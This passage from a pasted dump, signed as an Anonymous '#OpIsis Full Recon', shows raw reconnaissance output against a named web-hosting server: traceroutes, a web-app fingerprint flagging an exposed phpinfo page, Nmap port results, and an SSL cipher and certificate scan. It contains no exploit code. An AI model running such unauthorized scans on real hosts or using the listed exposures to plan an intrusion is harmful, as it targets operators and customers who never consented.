  2116. 2 33.81 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
  2117. 3 52.06 ms 37.120.128.166
  2118. 4 33.81 ms vlan304.as032.buc.ro.m247.com (77.243.185.226)
  2119. 5 33.80 ms ix-xe-11-1-1-0.tcore1.w6c-montreal.as6453.net (66.198.96.98)
  2120. 6 126.15 ms if-ae-12-2.tcore1.mtt-montreal.as6453.net (64.86.31.26)
  2121. 7 124.52 ms if-ae-0-2.tcore2.mtt-montreal.as6453.net (216.6.115.90)
  2122. 8 124.76 ms if-ae-5-2.tcore2.n0v-new-york.as6453.net (64.86.226.58)
  2123. 9 124.14 ms 80.231.131.157
  2124. 10 126.17 ms if-ae-2-2.tcore1.l78-london.as6453.net (80.231.131.2)
  2125. 11 118.07 ms if-ae-3-2.tcore1.pye-paris.as6453.net (80.231.154.142)
  2126. 12 118.85 ms if-ae-11-2.tcore1.pvu-paris.as6453.net (80.231.153.49)
  2127. 13 118.61 ms 195.219.87.9
  2128. 14 117.81 ms 195.219.87.25
  2129. 15 130.91 ms ae1-0.sdnqe10.dk.ip.tdc.net (83.88.12.247)
  2130. 16 134.15 ms cpe.xe-5-0-0-100.sdnqe10.dk.customer.tdc.net (87.51.85.234)
  2131. 17 133.16 ms 212.237.248.7
  2132. 18 133.07 ms linux260.unoeuro.com (93.191.156.145)
  2133. #######################################################################################################################################
  2134. wig - WebApp Information Gatherer
  2135.  
  2136.  
  2137. Scanning http://93.191.156.145...
  2138. ___________________ SITE INFO ___________________
  2139. IP Title
  2140. 93.191.156.145 This server is operated by UnoEu
  2141.  
  2142. ____________________ VERSION ____________________
  2143. Name Versions Type
  2144. Apache Platform
  2145. PHP 7.1.26 Platform
  2146.  
  2147. __________________ INTERESTING __________________
  2148. URL Note Type
  2149. /phpinfo.php PHP info file Interesting
  2150.  
  2151. _________________________________________________
  2152. Time: 0.8 sec Urls: 599 Fingerprints: 40401
  2153. #######################################################################################################################################
  2154. HTTP/1.1 406 Not Acceptable
  2155. Date: Wed, 30 Jan 2019 03:01:28 GMT
  2156. Content-Type: text/html; charset=iso-8859-1
  2157. Connection: keep-alive
  2158.  
  2159. HTTP/1.1 406 Not Acceptable
  2160. Date: Wed, 30 Jan 2019 03:01:28 GMT
  2161. Content-Type: text/html; charset=iso-8859-1
  2162. Connection: keep-alive
  2163. #######################################################################################################################################
  2164. Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 22:01 EST
  2165. Nmap scan report for linux260.unoeuro.com (93.191.156.145)
  2166. Host is up (0.13s latency).
  2167.  
  2168. PORT STATE SERVICE VERSION
  2169. 123/udp open|filtered ntp
  2170. Too many fingerprints match this host to give specific OS details
  2171. Network Distance: 18 hops
  2172.  
  2173. TRACEROUTE (using proto 1/icmp)
  2174. HOP RTT ADDRESS
  2175. 1 21.89 ms 10.246.200.1
  2176. 2 22.32 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
  2177. 3 41.11 ms 37.120.128.166
  2178. 4 21.95 ms vlan304.as032.buc.ro.m247.com (77.243.185.226)
  2179. 5 21.98 ms ix-xe-11-1-1-0.tcore1.w6c-montreal.as6453.net (66.198.96.98)
  2180. 6 114.17 ms if-ae-12-2.tcore1.mtt-montreal.as6453.net (64.86.31.26)
  2181. 7 113.79 ms if-ae-0-2.tcore2.mtt-montreal.as6453.net (216.6.115.90)
  2182. 8 113.86 ms if-ae-5-2.tcore2.n0v-new-york.as6453.net (64.86.226.58)
  2183. 9 119.44 ms 80.231.131.157
  2184. 10 113.90 ms if-ae-2-2.tcore1.l78-london.as6453.net (80.231.131.2)
  2185. 11 114.92 ms if-ae-3-2.tcore1.pye-paris.as6453.net (80.231.154.142)
  2186. 12 114.48 ms if-ae-11-2.tcore1.pvu-paris.as6453.net (80.231.153.49)
  2187. 13 114.91 ms 195.219.87.9
  2188. 14 114.51 ms 195.219.87.25
  2189. 15 128.96 ms ae1-0.sdnqe10.dk.ip.tdc.net (83.88.12.247)
  2190. 16 133.34 ms cpe.xe-5-0-0-100.sdnqe10.dk.customer.tdc.net (87.51.85.234)
  2191. 17 133.27 ms 212.237.248.7
  2192. 18 133.22 ms linux260.unoeuro.com (93.191.156.145)
  2193. ######################################################################################################################################
  2194. Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 22:03 EST
  2195. Nmap scan report for linux260.unoeuro.com (93.191.156.145)
  2196. Host is up (0.035s latency).
  2197.  
  2198. PORT STATE SERVICE VERSION
  2199. 161/tcp filtered snmp
  2200. 161/udp open|filtered snmp
  2201. Too many fingerprints match this host to give specific OS details
  2202. Network Distance: 18 hops
  2203.  
  2204. TRACEROUTE (using proto 1/icmp)
  2205. HOP RTT ADDRESS
  2206. 1 22.02 ms 10.246.200.1
  2207. 2 22.68 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
  2208. 3 37.55 ms 37.120.128.166
  2209. 4 22.27 ms vlan304.as032.buc.ro.m247.com (77.243.185.226)
  2210. 5 22.32 ms ix-xe-11-1-1-0.tcore1.w6c-montreal.as6453.net (66.198.96.98)
  2211. 6 114.06 ms if-ae-12-2.tcore1.mtt-montreal.as6453.net (64.86.31.26)
  2212. 7 113.89 ms if-ae-0-2.tcore2.mtt-montreal.as6453.net (216.6.115.90)
  2213. 8 114.09 ms if-ae-5-2.tcore2.n0v-new-york.as6453.net (64.86.226.58)
  2214. 9 116.26 ms 80.231.131.157
  2215. 10 113.55 ms if-ae-2-2.tcore1.l78-london.as6453.net (80.231.131.2)
  2216. 11 113.51 ms if-ae-3-2.tcore1.pye-paris.as6453.net (80.231.154.142)
  2217. 12 114.17 ms if-ae-11-2.tcore1.pvu-paris.as6453.net (80.231.153.49)
  2218. 13 113.43 ms 195.219.87.9
  2219. 14 113.44 ms 195.219.87.25
  2220. 15 136.63 ms ae1-0.sdnqe10.dk.ip.tdc.net (83.88.12.247)
  2221. 16 130.45 ms cpe.xe-5-0-0-100.sdnqe10.dk.customer.tdc.net (87.51.85.234)
  2222. 17 130.41 ms 212.237.248.7
  2223. 18 129.81 ms linux260.unoeuro.com (93.191.156.145)
  2224. #######################################################################################################################################
  2225. Version: 1.11.12-static
  2226. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  2227.  
  2228. Connected to 93.191.156.145
  2229.  
  2230. Testing SSL server 93.191.156.145 on port 443 using SNI name 93.191.156.145
  2231.  
  2232. TLS Fallback SCSV:
  2233. Server supports TLS Fallback SCSV
  2234.  
  2235. TLS renegotiation:
  2236. Secure session renegotiation supported
  2237.  
  2238. TLS Compression:
  2239. Compression disabled
  2240.  
  2241. Heartbleed:
  2242. TLS 1.2 not vulnerable to heartbleed
  2243. TLS 1.1 not vulnerable to heartbleed
  2244. TLS 1.0 not vulnerable to heartbleed
  2245.  
  2246. Supported Server Cipher(s):
  2247. Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  2248. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  2249. Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
  2250. Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
  2251. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  2252. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  2253. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  2254. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  2255. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
  2256. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  2257. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
  2258. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  2259. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
  2260. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
  2261. Accepted TLSv1.2 128 bits AES128-SHA256
  2262. Accepted TLSv1.2 256 bits AES256-SHA256
  2263. Accepted TLSv1.2 128 bits AES128-SHA
  2264. Accepted TLSv1.2 256 bits AES256-SHA
  2265. Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  2266. Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  2267. Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  2268. Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  2269. Accepted TLSv1.1 128 bits AES128-SHA
  2270. Accepted TLSv1.1 256 bits AES256-SHA
  2271. Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  2272. Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  2273. Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  2274. Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  2275. Accepted TLSv1.0 128 bits AES128-SHA
  2276. Accepted TLSv1.0 256 bits AES256-SHA
  2277.  
  2278. SSL Certificate:
  2279. Signature Algorithm: sha256WithRSAEncryption
  2280. RSA Key Strength: 2048
  2281.  
  2282. Subject: *.unoeuro.com
  2283. Altnames: DNS:*.unoeuro.com, DNS:unoeuro.com
  2284. Issuer: COMODO RSA Organization Validation Secure Server CA
  2285.  
  2286. Not valid before: Feb 10 00:00:00 2016 GMT
  2287. Not valid after: Feb 20 23:59:59 2019 GMT
  2288. #######################################################################################################################################
  2289. Anonymous JTSEC #OpIsis Full Recon #7
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement